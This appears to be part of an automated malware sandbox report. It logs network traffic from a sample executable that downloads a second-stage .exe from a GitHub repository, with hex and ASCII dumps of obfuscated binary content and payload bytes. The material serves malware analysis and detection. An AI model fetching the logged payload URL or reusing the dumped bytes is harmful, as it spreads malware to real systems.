                                                                              2022-06-01 23:53:22 UTC38INData Raw: f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 fe f8 78 07 f8 f8 ff f8 3f 07 f8 f8 f9 f8 43 0a f8 f8 fa f8 55 0a f8 f8 fb f8 8b 07 f8 18 fa f8 e1 f8 f8 18 f9 f8 29 f8 f8 f8 f9 f8 29 f8 08 08 fa f8 e1 f8 f8 f8 f9 f8 29 f8 f8 f8 fa f8 e1 f8 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 84 0a f8 f8 f9 f8 84 0a f8 f8 fa f8 78 07 f8 f8 fb f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8
                                                                              Data Ascii: x??F/7CJU/7CJUx?CU)))?F/7/7x??Fx?
                                                                              2022-06-01 23:53:22 UTC39INData Raw: c0 fa 71 f8 f8 04 c0 fa 71 f8 ff 04 ca fa b9 f8 0b 04 d5 fa 11 f8 12 04 df fa 11 f8 22 04 e9 fa 11 f8 33 04 e9 fa 61 f9 49 04 e9 fa 79 f9 6b 04 f3 fa 79 f9 9c 04 ff fb 91 f9 c5 04 0b fb 99 f9 df 04 16 fb 91 f9 e3 04 21 fb 91 f9 e7 04 21 fb 91 f9 ef 04 21 fb 71 f8 f4 04 2b fb c9 f8 04 05 35 fb 99 f9 0b 05 3f fb a1 f9 2e 05 3f fb 99 f9 42 05 3f fb a9 f9 5c 05 48 fb 29 f8 0b fb 53 fb b1 f9 da 01 5e fb b1 f9 78 05 6a fb b1 f9 12 01 76 fb c9 f8 da 01 81 fb 79 f8 8c 05 8b fb 71 f8 9f 05 96 fb e1 f8 aa 05 a1 fb b9 f9 bc 05 ac fb 61 f8 c2 00 b5 fb 19 f9 cd 05 c5 fb 19 f9 e1 05 d2 fb c1 f9 06 06 de fb a1 f8 12 06 f4 fb c9 f8 da 01 07 fc c9 f8 da 01 11 fc c9 f8 04 05 1b fc e1 f8 48 06 25 fc 31 f9 59 06 2f fc b9 f9 cd 03 3b fc b9 f9 c1 03 3b fc 71 f8 73 06 46 fc a1
                                                                              Data Ascii: qq"3aIyky!!!q+5?.?B?\H)S^xjvyqaH%1Y/;;qsF
                                                                              2022-06-01 23:53:22 UTC41INData Raw: f8 f8 f9 ff f9 4c 0b fa f8 74 5c f8 f8 2b f8 d0 5c f8 f8 2c f8 d8 5c f8 f8 2d f8 e1 5c f8 f8 2e f8 e6 5c f8 f8 2f f8 fe 5d f8 f8 30 f8 07 5d f8 f8 31 f8 0e 5d f8 f8 32 f8 39 5d f8 f8 33 f8 3f 7d f8 f8 34 f8 4f 7d f8 f8 35 f8 56 7e f8 f8 36 f8 6b 7e f8 f8 37 f8 71 7e f8 f8 38 f8 78 7e f8 f8 39 f8 a5 7e f8 f8 3a f8 8f 80 f8 f8 3c f8 6b 82 f8 f8 40 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 0c f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 66 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 1c f8 f8 f8 f8 f8 02 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 c0 01 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 b7 02 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 83 04
                                                                              Data Ascii: Lt\+\,\-\.\/]0]1]29]3?}4O}5V~6k~7q~8x~9~:<k@f
                                                                              2022-06-01 23:53:22 UTC42INData Raw: 17 f8 77 f8 ba 78 f8 ba 79 f8 ba 7a f8 ba 7b f8 ba 7c f8 ba 7e f8 ba 7f f8 ba 80 f8 ba 81 f8 ba 82 f8 ba 83 f8 ba 84 f8 ba 85 f8 ba 86 f8 ba 87 f8 ba 88 f8 ba 89 f8 ba 8a f8 ba 8b f8 ba 8c f8 ba 8d f8 ba 8e f8 ba 8f f8 ba 90 f8 ba 91 f8 ba 92 f8 ba 93 f8 ba 94 f8 ba 95 f8 ba 96 f8 ba 97 f8 f9 fa f8 fa fa f8 fb fa f8 fc fa f8 fd fa f8 fe fa f8 ff fa f8 00 fa f8 06 fa f8 07 fa f8 08 fa f8 09 fa f8 0a fa f8 0b fa f8 0c fa f8 0d fa f8 0e fa f8 0f fa f8 10 fa f8 11 fa f8 12 fa f8 13 fa f8 14 fa f8 15 fa f8 16 fa f8 17 fa f8 77 fa f8 ba 78 fa f8 ba 79 fa f8 ba 7a fa f8 ba 7b fa f8 3d 66 5b 67 5c 61 66 5f f8 4b 71 6b 6c 5d 65 26 4c 5d 70 6c f8 d9 7a 9b f8 61 c7 8a c1 9a c6 89 e7 b7 b5 f8 e1 80 97 ca 87 d2 b7 e1 80 7f ba a3 f8 bd 86 cd b3 d3 92 e7 b7 b5 e7 b7 b5
                                                                              Data Ascii: wxyz{|~wxyz{=f[g\af_Kqkl]e&L]plza
                                                                              2022-06-01 23:53:22 UTC43INData Raw: 67 66 48 67 61 66 6c 5d 6a f8 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 3a 71 6c 5d 6b f8 76 17 f8 5f 5d 6c 57 4d 66 61 5b 67 5c 5d f8 5f 5d 6c 57 39 4b 3b 41 41 f8 5f 5d 6c 57 3c 5d 5e 59 6d 64 6c f8 5f 5d 6c 57 4d 4c 3e 30 f8 3f 5d 6c 3b 6d 6a 6a 5d 66 6c 48 6a 67 5b 5d 6b 6b f8 5f 5d 6c 57 45 59 61 66 45 67 5c 6d 64 5d f8 76 ba 7c f8 5f 5d 6c 57 3e 61 64 5d 46 59 65 5d f8 76 ba 7e f8 4c 67 4b 6c 6a 61 66 5f f8 76 ba 7f f8 5f 5d 6c 57 48 6a 67 5b 5d 6b 6b 46 59 65 5d f8 76 ba 80 f8 48 59 6c 60 f8 3b 67 65 5a 61 66 5d f8 3f 5d 6c 48 6a 67 5b 5d 6b 6b 5d 6b 3a 71 46 59 65 5d f8 45 61 5b 6a 67 6b 67 5e 6c 26 4e 61 6b 6d 59 64 3a 59 6b 61 5b f8 44 5d 66 f8 4c 67 41 66 6c 2b 2a f8 3f 5d 6c 3b 60 59 6a f8 3b 60 6a 4f f8 3d 66 6e 61 6a 67 66 65 5d 66 6c f8 3f 5d 6c
                                                                              Data Ascii: gfHgafl]j<]d]_Yl]?]l:ql]kv_]lWMfa[g\]_]lW9K;AA_]lW<]^Ymdl_]lWML>0?]l;mjj]flHjg[]kk_]lWEYafEg\md]v|_]lW>ad]FYe]v~LgKljaf_v_]lWHjg[]kkFYe]vHYl`;geZaf]?]lHjg[]kk]k:qFYe]Ea[jgkg^l&NakmYd:Yka[D]fLgAfl+*?]l;`Yj;`jO=fnajgfe]fl?]l
                                                                              2022-06-01 23:53:22 UTC45INData Raw: f8 3b 67 65 68 59 6a 5d 4b 6c 6a 61 66 5f f8 ba 8d fa f8 ba 8e fa f8 ba 8f fa f8 4b 68 64 61 6c f8 ba 90 fa f8 76 ba 90 fa f8 5f 5d 6c 57 39 6b 6b 5d 65 5a 64 71 f8 ba 91 fa f8 76 ba 91 fa f8 3f 5d 6c 47 5a 62 5d 5b 6c f8 ba 92 fa f8 76 ba 92 fa f8 ba 93 fa f8 76 ba 93 fa f8 3f 5d 6c 3d 70 5d 5b 6d 6c 61 66 5f 39 6b 6b 5d 65 5a 64 71 f8 ba 94 fa f8 3f 5d 6c 45 59 66 61 5e 5d 6b 6c 4a 5d 6b 67 6d 6a 5b 5d 4b 6c 6a 5d 59 65 f8 ba 95 fa f8 76 ba 95 fa f8 ba 96 fa f8 4a 5d 59 5c f8 ba 97 fa f8 76 ba 97 fa f8 26 5b 5b 6c 67 6a f8 3a 3a f8 26 5b 6c 67 6a f8 e7 b7 b5 e7 b7 b5 c7 a9 e1 80 7f e7 b7 b5 f8 e7 b7 b5 e7 b7 b5 c6 7d e3 82 b3 c4 a6 f8 e7 b7 b5 d7 7a bb 9d bd ac ca 9a f8 d9 7a a0 f8 67 5a 62 5d 5b 6c f8 65 5d 6c 60 67 5c f8 59 f8 5a f8 3a 5d 5f 61 66 41
                                                                              Data Ascii: ;gehYj]Kljaf_Khdalv_]lW9kk]eZdqv?]lGZb][lvv?]l=p][mlaf_9kk]eZdq?]lEYfa^]klJ]kgmj[]Klj]YevJ]Y\v&[[lgj::&[lgj}zzgZb][le]l`g\YZ:]_afA
                                                                              2022-06-01 23:53:22 UTC46INData Raw: 6c 5d 45 5d 65 5a 5d 6a 4a 5d 5e 6b 3c 5d 64 5d 5f 59 6c 5d 6b f8 6c 71 68 5d 41 3c f8 3b 6a 5d 59 6c 5d 3f 5d 6c 4b 6c 6a 61 66 5f 3c 5d 64 5d 5f 59 6c 5d f8 67 6f 66 5d 6a 4c 71 68 5d f8 e3 94 b0 c2 a2 bc 8b e7 b7 b5 d1 ad f8 bd 7e e7 7a b1 e7 b7 b5 d4 a2 cd 7c f8 d6 b0 ce 87 e7 b7 b5 e7 b7 b5 e7 b7 b5 f8 bb 8a ba a3 cf 81 e7 b6 a5 c2 8b f8 4d 66 6e 5d 6a 61 5e 61 59 5a 64 5d 3b 67 5c 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4b 5d 5b 6d 6a 61 6c 71 f8 4c 59 6a 5f 5d 6c 3e 6a 59 65 5d 6f 67 6a 63 39 6c 6c 6a 61 5a 6d 6c 5d f8 4b 71 6b 6c 5d 65 26 4a 6d 66 6c 61 65 5d 26 4e 5d 6a 6b 61 67 66 61 66 5f f8 46 5d 6d 6c 6a 59 64 4a 5d 6b 67 6d 6a 5b 5d 6b 44 59 66 5f 6d 59 5f 5d 39 6c 6c 6a 61 5a 6d 6c 5d f8 4d 64 6c 61 65 59 6c 5d 4a 5d 6b 67 6d
                                                                              Data Ascii: l]E]eZ]jJ]^k<]d]_Yl]klqh]A<;j]Yl]?]lKljaf_<]d]_Yl]gof]jLqh]~z|Mfn]ja^aYZd];g\]9lljaZml]Kqkl]e&K][mjalqLYj_]l>jYe]ogjc9lljaZml]Kqkl]e&Jmflae]&N]jkagfaf_F]mljYdJ]kgmj[]kDYf_mY_]9lljaZml]MdlaeYl]J]kgm
                                                                              2022-06-01 23:53:22 UTC47INData Raw: 5c 40 59 66 5c 64 5d f8 4a 6d 66 6c 61 65 5d 45 5d 6c 60 67 5c 40 59 66 5c 64 5d f8 3f 5d 6c 45 5d 6c 60 67 5c 3e 6a 67 65 40 59 66 5c 64 5d f8 5f 5d 6c 57 41 6b 4b 6c 59 6c 61 5b f8 5f 5d 6c 57 3e 61 5d 64 5c 4c 71 68 5d f8 3b 6a 5d 59 6c 5d 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 48 59 6a 59 65 5d 6c 5d 6a 6b f8 48 59 6a 59 65 5d 6c 5d 6a 41 66 5e 67 f8 5f 5d 6c 57 48 59 6a 59 65 5d 6c 5d 6a 4c 71 68 5d f8 5f 5d 6c 57 4a 5d 6c 6d 6a 66 4c 71 68 5d f8 3c 71 66 59 65 61 5b 45 5d 6c 60 67 5c f8 4b 71 6b 6c 5d 65 26 4a 5d 5e 64 5d 5b 6c 61 67 66 26 3d 65 61 6c f8 3f 5d 6c 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 41 44 3f 5d 66 5d 6a 59 6c 67 6a f8 47 68 3b 67 5c 5d 6b f8 44 5c 59 6a 5f 57 28 f8 47 68 3b 67 5c 5d f8 3d 65 61 6c f8 44 5c 59 6a 5f 57 29 f8 44 5c 59 6a
                                                                              Data Ascii: \@Yf\d]Jmflae]E]l`g\@Yf\d]?]lE]l`g\>jge@Yf\d]_]lWAkKlYla[_]lW>a]d\Lqh];j]Yl]<]d]_Yl]?]lHYjYe]l]jkHYjYe]l]jAf^g_]lWHYjYe]l]jLqh]_]lWJ]lmjfLqh]<qfYea[E]l`g\Kqkl]e&J]^d][lagf&=eal?]lAD?]f]jYlgjAD?]f]jYlgjGh;g\]kD\Yj_W(Gh;g\]=ealD\Yj_W)D\Yj
                                                                              2022-06-01 23:53:22 UTC49INData Raw: 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28
                                                                              Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:22 UTC50INData Raw: f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8
                                                                              Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
                                                                              2022-06-01 23:53:22 UTC51INData Raw: 28 f8 28 f8 2e f8 3c f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2e f8 2c f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2d f8 2c f8 28 f8 28 f8 2e f8 3b f8 28 f8 28 f8 2e f8 29 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 2d f8 28 f8 28 f8 2c f8 3b f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 28 f8 29 f8 28 f8 28 f8 2a f8 39 f8 28 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2b f8 28 f8 28 f8 28 f8 2b f8 2a f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 39 f8 31 f8 28 f8 28 f8 2a f8 28 f8 28 f8 28 f8 2f f8 2c f8 28 f8 28 f8 2e f8 30 f8 28 f8 28 f8 2e f8 2f f8 28 f8 28 f8 2e f8 31 f8 28 f8 28 f8 2f f8 2a f8 28 f8 28 f8 2f f8 31 f8 28 f8 28 f8 2f f8 28 f8 28 f8 28 f8 2e f8 3e f8 28 f8 28 f8 2c f8 2b
                                                                              Data Ascii: ]RHA1`BW{m2>kLyEVU,&`q^lcYa)r[>|Y@jP"Ok\aIqW,VcM0CiVP/y4Db"(=>(cJV&zR2Z.lB2uxHXXbM}tuEjy%3cU#nj(P~lphVi75
                                                                              2022-06-01 23:53:22 UTC187INData Raw: a6 0b 45 2a f7 e8 40 39 8d ba 22 b2 38 ef 32 57 ed 9e 41 ef 20 2a 3d f9 8e b9 6a 3c 5f 9d 16 06 07 ab 25 f7 1e 66 77 7b 65 42 cf 5b 5a 48 16 85 b6 6f 8d a3 16 06 17 88 b8 0f f4 8d 97 ff ff f0 c0 7d 9d 82 c8 54 dd 4a 9b 60 64 51 5d 1c d1 5a ef ce 64 34 46 e0 a3 85 de 5c a8 12 f2 49 c7 73 4e 30 da 38 1f f8 f1 b7 5e 07 c9 52 eb 96 f1 4c 7d d7 31 b8 7c 2c bb 49 bb 46 c5 34 c1 b6 62 3a c5 96 0e 45 2f 7f e5 b5 e7 db 27 02 a3 15 7a cc ab c8 e3 31 c9 06 d4 29 f7 c2 41 4b dd 83 23 9f 0c d1 be 9c 53 30 b4 f5 f3 5c 96 b7 b8 9c 8a fa 7e 00 d7 84 9d 4c 11 a2 dd 3e 80 27 ad c8 23 f0 31 92 c9 75 67 f4 4f b9 f0 33 6f ef c1 5b 2d 3d 36 f1 2a 98 40 5d 89 f6 2a d5 16 e5 8f b7 ad a8 7b c8 4d 87 a8 94 77 c4 ef f6 d9 48 c1 9f 3e cc 07 bd c5 aa ac 4f 00 5c 7e 9d 91 45 2f b3 c5
                                                                              Data Ascii: E*@9"82WA *=j<_%fw{eB[ZHo}TJ`dQ]Zd4F\IsN08^RL}1|,IF4b:E/'z1)AK#S0\~L>'#1ugO3o[-=6*@]*{MwH>O\~E/


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                              1           192.168.2.4  49766        140.82.121.3    443               C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp                kBytes transferred  Direction  Data
                                                                              2022-06-01 23:53:41 UTC  190                 OUT        GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1
                                                                              Host: github.com
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:41 UTC  190                 IN         HTTP/1.1 302 Found
                                                                              Server: GitHub.com
                                                                              Date: Wed, 01 Jun 2022 23:52:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                              permissions-policy: interest-cohort=()
                                                                              Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                              Location: https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exe
                                                                              Cache-Control: no-cache
                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                              X-Frame-Options: deny
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 0
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                              2022-06-01 23:53:41 UTC  191                 IN         Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                                              2           192.168.2.4  49767        185.199.108.133  443               C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp                kBytes transferred  Direction  Data
                                                                              2022-06-01 23:53:42 UTC  193                 OUT        GET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Host: raw.githubusercontent.com
                                                                              2022-06-01 23:53:42 UTC  193                 IN         HTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 1472680
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "6b6903fce2d862bd129ed03ef0037429e4f49bb137a65b7d3e4355633db14b85"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: 6840:AD8C:35A0DF:3BC5C0:6297FC06
                                                                              Accept-Ranges: bytes
                                                                              Date: Wed, 01 Jun 2022 23:53:42 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-mxp6947-MXP
                                                                              X-Cache: MISS
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1654127622.232593,VS0,VE117
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              X-Fastly-Request-ID: fbf1f93d744eb5a7acb8a9fa871d86edaeea4b47
                                                                              Expires: Wed, 01 Jun 2022 23:58:42 GMT
                                                                              Source-Age: 0
                                                                              2022-06-01 23:53:42 UTC222INData Raw: 63 19 7a dc 36 e9 ed f7 ff ff 5b e5 72 1c 83 27 35 83 f6 a9 e9 77 f4 ff ff cf 5b 5f 60 f5 b9 d1 3e 1a e1 9d 01 32 e0 6b 15 fd 8b 8a 13 e9 ea f7 ff ff 74 85 b0 f8 70 57 d5 aa 20 7b 69 10 2d 28 6d 44 b9 29 7a 80 e6 f9 e9 45 f9 ff ff c4 01 fd 7d b9 3a ae cf c2 ab 94 e9 5e f8 ff ff 7c 56 d5 86 3e e9 2c ff ff ff 68 27 6e c5 fe ed cb b0 24 4d 29 ce cc 17 9b 98 74 d6 e9 3d fb ff ff 6c 51 69 2d f9 c3 b5 dd 96 b1 a2 c6 1e cb f1 36 98 b7 fb bf a1 d1 e9 00 f6 ff ff 81 cf 0b a5 2e e2 0e d9 9a 55 0d 83 6b f7 09 ac a9 9b fa e6 90 69 d3 ec e4 06 7c 45 60 eb 2d 17 76 e6 2c 1f 30 c4 8e 7b c2 9b e9 6a f6 ff ff 49 40 39 a8 48 87 e0 75 fc d7 d3 20 a3 06 d1 4f 10 2d a6 f2 e9 94 f4 ff ff 70 70 e4 a8 e9 43 ff ff ff c4 c2 37 82 ad d8 d2 84 be e9 57 f4 ff ff fc 8c c0 63 ae e9 66
                                                                              Data Ascii: cz6[r'5w[_`>2ktpW {i-(mD)zE}:^|V>,h'n$M)t=lQi-6.Uki|E`-v,0{jI@9Hu O-ppC7Wcf
                                                                              2022-06-01 23:53:42 UTC224INData Raw: 7b 05 00 00 44 79 18 21 6c 5c f2 fd 28 ac 9e 93 d8 82 f7 45 ea 0e d2 eb 16 a0 df 35 6f 4e a7 6e fd e9 c5 03 00 00 bd 54 6e 6d f4 47 96 58 0e e9 88 06 00 00 be 5e 69 34 e9 e7 01 00 00 cb ac 87 e4 bc 32 71 3f 27 b6 4f 60 12 1a ea 1d a3 e9 7e 03 00 00 1e 5a 46 5b 80 4f 69 01 a2 e4 e9 9f 07 00 00 75 d9 36 10 6f f7 5c c8 9e a6 85 fc 02 40 a8 bc 1c a8 80 10 4b 11 57 0d 37 04 e9 c2 fc ff ff 0d 95 16 85 26 f4 39 6a 7f 03 b5 fd 1c 09 41 33 b1 0f 12 69 89 24 1b 1d a1 b7 e9 49 fe ff ff aa 65 c7 aa e3 e9 1a fe ff ff f5 87 27 64 e1 d5 83 b1 4d fe f8 eb c5 06 a9 4a bd a5 ae 9c 62 c1 a8 61 7d c6 e9 66 fd ff ff 5c e3 7b 09 c2 bb 58 66 5e 38 57 ac 98 c5 e9 80 00 00 00 78 5c 6f 51 62 7c 9c 1c e9 2c 02 00 00 50 f9 1f 8d ed 37 ad 24 4e b5 e4 c2 e9 f2 06 00 00 fb ba b9 90 90
                                                                              Data Ascii: {Dy!l\(E5oNnTnmGX^i42q?'O`~ZF[Oiu6o\@KW7&9jA3i$Ie'dMJba}f\{Xf^8Wx\oQb|,P7$N
                                                                              2022-06-01 23:53:42 UTC225INData Raw: 01 15 e9 5a fe ff ff fb 9c d0 d3 e9 73 02 00 00 fc 81 77 4c a2 04 ca b0 fb c8 b4 68 39 61 80 ef fa 63 ed b2 24 27 0f 31 ea d4 0a e9 ae fd ff ff 6e 45 be cd c3 2b 46 73 58 01 cf 73 47 28 ac e9 dd 00 00 00 cd b7 bb 56 d3 47 c5 1f e2 25 80 e9 a6 fb ff ff f9 0e 04 c9 ee 7c fc 5f 05 e9 46 fe ff ff 2d 87 ac 28 45 87 32 62 ed 8f ba e9 7c f8 ff ff 58 49 22 82 20 b7 13 02 cf 9c 1d 2d 97 d0 09 ae e9 fe fc ff ff 40 5b c1 3f 5c 11 e8 4a 4c 75 86 f0 fe 87 11 aa aa d2 a6 0d 5c bf e9 3a ff ff ff cf 4a 85 b3 ed 41 de d4 b3 a6 45 30 08 4f 9f c5 f0 2f 3d e9 af fe ff ff f8 92 1d 04 98 58 0e 43 01 cd 41 01 2c 03 7f 96 af ad b2 e9 48 fc ff ff ea 7c 7a 18 24 89 bf 86 8b f8 48 b6 64 18 e7 7e ee e2 c4 86 14 e9 42 fc ff ff 9f 06 d0 db ce 81 5c 35 d8 1f b8 67 54 0c d3 a5 2a 17 5e
                                                                              Data Ascii: ZswLh9ac$'1nE+FsXsG(VG%|_F-(E2b|XI" -@[?\JLu\:JAE0O/=XCA,H|z$Hd~B\5gT*^
                                                                              2022-06-01 23:53:42 UTC226INData Raw: c6 eb 95 28 f6 cb 76 b7 c5 e9 65 10 00 00 54 09 3d 25 d9 34 90 1c 84 bf 39 a4 a6 12 97 ee 0e 3c e9 e8 09 00 00 af a8 8f 5b 8b 85 d0 9c e9 ab 09 00 00 d5 26 69 6d 60 52 46 92 16 99 1e ea 62 9c 11 72 a3 62 e2 45 3a 2e e9 84 07 00 00 38 e2 46 5f e9 aa 0b 00 00 5a 2e 7f c7 a8 bf e9 fd 05 00 00 b1 70 3b 50 67 cf 2a b8 c9 e9 37 0e 00 00 4f 3a f2 5b 80 0d 5a 51 ed 15 d0 12 b1 9c 78 eb 2c dd ac 30 be 2a 96 82 e5 36 43 16 8c 9c 47 95 06 72 e9 48 02 00 00 04 58 1a 06 9d e2 97 e7 7b 42 29 eb 12 12 30 e6 d8 5c 2b c7 b7 9c e9 c2 07 00 00 ed b9 ae ac e9 fd 00 00 00 49 db 02 46 e9 1f c3 85 6c 20 c3 e9 87 0b 00 00 23 14 58 80 39 4e 2d 25 84 25 a8 9f e5 f4 cd 7a 3e b8 ed ed e9 5b 0d 00 00 6f 6a 51 86 0a f0 cb 32 e9 24 3e ac 87 a3 7e a4 0f 39 e9 1f 05 00 00 b3 d9 fb f0 27
                                                                              Data Ascii: (veT=%49<[&im`RFbrbE:.8F_Z.p;Pg*7O:[ZQx,0*6CGrHX{B)0\+IFl #X9N-%%z>[ojQ2$>~9'
                                                                              2022-06-01 23:53:42 UTC227INData Raw: 6f 81 ab fb e5 08 64 e9 5a 03 00 00 12 b9 f1 f9 14 c4 fe cb 8c 83 be 30 c5 7c 37 33 0c ae ac e9 19 06 00 00 e3 68 3a f0 52 c8 d3 5f 4a ed 63 d9 e9 62 09 00 00 f2 1e 99 eb 0a 2b 5a e4 91 06 a1 66 77 9d b2 03 65 47 d2 b8 db c9 34 ee 09 d0 d2 53 18 19 eb 22 2d 99 8f e2 7c e9 74 09 00 00 70 91 93 77 73 b4 9d c6 24 4f 4f b5 21 a2 ad e9 73 fa ff ff 8c a8 64 a5 e9 ec fd ff ff f8 c0 77 fb c8 bd 2c d8 b7 8b 82 2b da b5 08 cf b2 68 e9 8c 05 00 00 b9 81 54 90 0f de 57 1f 9b 25 59 4e 07 65 40 cd c8 fc 0a 2e 9a e9 f1 03 00 00 c8 24 b4 63 ee f9 98 97 0e 43 e9 0f fa ff ff 91 06 ae 10 40 79 55 13 95 9a 30 f1 c0 c2 04 82 0b e9 06 03 00 00 2d 81 3d a9 16 29 61 48 c3 30 b3 38 49 9d 20 22 51 e4 14 5c 86 db 96 e9 a5 fe ff ff ed a7 ae 6b 76 15 8d 42 6b f4 11 83 19 a5 e9 f8 05
                                                                              Data Ascii: odZ0|73h:R_Jcb+ZfweG4S"-|tpws$OO!sdw,+hTW%YNe@.$cC@yU0-=)aH08I "Q\kvBk
